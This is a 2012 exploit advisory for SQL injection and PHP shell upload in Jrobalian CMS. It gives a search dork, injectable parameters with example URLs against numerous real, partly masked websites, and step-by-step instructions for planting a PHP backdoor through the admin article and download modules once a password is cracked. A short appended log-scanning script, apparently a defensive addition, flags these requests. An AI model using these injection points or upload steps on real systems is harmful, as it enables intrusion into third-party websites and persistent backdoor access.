Jrobalian CMS SQL Injection Vulnerability

2012.07.22
Credit: X-Cisadane
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

=====================================================
Jrobalian CMS SQL Injection Vulnerability
=====================================================

:------------------------------------------------------------------------:
: # Exploit Title : Jrobalian CMS SQL Injection Vulnerability
: # Date          : 21 July 2012
: # Author        : X-Cisadane
: # Software Link : http://www.jrobalian.com/
: # Version       : ALL
: # Category      : Web Applications
: # Vulnerability : SQL Injection Vulnerability & Upload Shell Vulnerability
: # Tested On     : Mozilla Firefox 7.0.1 (Windows)
: # Greetz to     : Andry Priatna, X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club, Winda Utari
:------------------------------------------------------------------------:

DORKS
=====
inurl:i.php?mid=

Proof of Concept
================

1. SQL Injection (With Error Notice & Without Error Notice)

SITE TARGET.com/content/i.php?mid=[SQLi]
OR
SITE TARGET.com/content/i.php?mid=Integer Value&id=[SQLi]

Example :
http://www.daiXaircon.co.id/content/i.php?mid=4&id=41'
http://www.inXtors-academy.co.id/content/i.php?mid=3&id=7'
http://www.pdpXsi.co.id/content/i.php?mid=3&id=112'
http://www.indoXksesfutures.com/content/i.php?mid=3&id=81'
http://www.shopXattress.com/content/i.php?mid=69'

Others :
SITE TARGET.com/content/news.php?catid=[SQLi]

Example :
http://www.indoXksesfutures.com/content/news.php?catid=1'&?mid=6&id=20
http://www.idijaXXar.com/content/news.php?catid=1'
http://www.contoXwebsite.com/content/news.php?catid=1'&mid=4&id=24
http://www.quadrX.co.id/content/news.php?show=comment&id=11'
http://www.contohXXXbsite.com/content/pd_events.php?mid=4&id=&catid=1'&show=archive
http://www.daikinaXXXcon.co.id/content/products.php?plid=1&mid=2&id=21'
http://www.daikinXXXrcon.co.id/content/projects.php?mid=3&ptid=13'
http://www.daikXXXaircon.co.id/content/gallery.php?&mid=13&id=17'
http://www.daXXXircon.co.id/content/downloads.php?&mid=5&id=28'
http://www.daikiXXcon.co.id/content/faqs.php?&mid=5&id=29'
http://www.daikiXXcon.co.id/content/training.php?&mid=5&id=30'

Explore more yourself...
Tested with Havij - Advanced SQL Injection Tool Version 1.15 Free

2. Upload Shell (Must login with admin privilege)

If the force is with you (you've successfully cracked the password) 0:) you can log in to the CMS with Admin privilege.

Admin login page : SITE TARGET.com/admin/ or SITE TARGET.com/content/admin/
Example : http://www.shop4mattress.com/admin/

Then upload a shell from Administrator Modules -> Website Contents -> Newsroom & Articles -> Create NEW Articles.
Insert an ATTACHMENT (your .php Backdoor), then set Published to yes and click SAVE!
After that, check your PHP Backdoor in this directory -> 'SITE TARGET.com/content_file/YOUR PHP BACKDOOR.php'

OR you can upload a PHP shell from Administrator Modules -> Website Contents -> Downloads -> Create New file to Downloads.
Insert Title, Description, insert your PHP Backdoor (browse), then click SAVE!
After that, check your PHP Backdoor in this directory -> 'SITE TARGET.com/content/downloads.php'
Then click the button 'Unduh' (Download). Your browser will show a pop-up to download a file, example : file21_ba.php <--- your PHP Backdoor, which is automatically renamed by the CMS.
You can access file21_ba.php by following this link 'SITE TARGET.com/downloads/Your Renamed PHP Backdoor.php'
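A detection sketch for the two stages described above, added here as an example and not part of the original advisory: it flags requests whose mid, id, catid, plid or ptid value is not a plain integer, and requests for .php files served from the content_file/ and downloads/ directories. The combined log format, the sample lines, the addresses and the name placeholder.php are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters the advisory shows carrying integer identifiers.
INT_PARAMS = {"mid", "id", "catid", "plid", "ptid"}
# Directories the advisory names as where uploaded attachments land.
UPLOAD_DIRS = ("/content_file/", "/downloads/")
# Assumption: Apache/nginx "combined" log format; only IP and request target are used.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/')

# Constructed sample log (documentation IP ranges, placeholder file name).
SAMPLE_LOG = """\
192.0.2.10 - - [21/Jul/2012:10:00:01 +0700] "GET /content/i.php?mid=4&id=41 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [21/Jul/2012:10:00:05 +0700] "GET /content/i.php?mid=4&id=41%27 HTTP/1.1" 200 612 "-" "Mozilla/5.0"
198.51.100.7 - - [21/Jul/2012:10:00:09 +0700] "GET /content/news.php?catid=1'&?mid=6&id=20 HTTP/1.1" 200 598 "-" "Mozilla/5.0"
198.51.100.7 - - [21/Jul/2012:10:07:30 +0700] "GET /content_file/placeholder.php HTTP/1.1" 200 87 "-" "Mozilla/5.0"
192.0.2.10 - - [21/Jul/2012:10:08:00 +0700] "GET /content/downloads.php?mid=5&id=28 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""


def classify(line):
    """Return (client_ip, finding, detail) tuples for one access-log line."""
    m = REQUEST_RE.match(line)
    if not m:
        return []
    ip, target = m.groups()
    url = urlsplit(target)
    path = url.path.lower()
    if not path.endswith(".php"):
        return []
    findings = []
    # A script served from an upload directory: attachments should never execute.
    if any(d in path for d in UPLOAD_DIRS):
        findings.append((ip, "php-in-upload-dir", url.path))
    # parse_qsl percent-decodes, so %27 and a literal quote are treated alike.
    for name, value in parse_qsl(url.query):
        key = name.lstrip("?").lower()  # tolerate the stray "&?mid=" form seen above
        if key in INT_PARAMS and not re.fullmatch(r"[0-9]+", value):
            findings.append((ip, "non-integer-id", f"{key}={value}"))
    return findings


def scan(log_text):
    """Classify every line of a log and return all findings in order."""
    return [f for line in log_text.splitlines() for f in classify(line)]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding, sep="\t")
```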

References:

http://www.jrobalian.com/

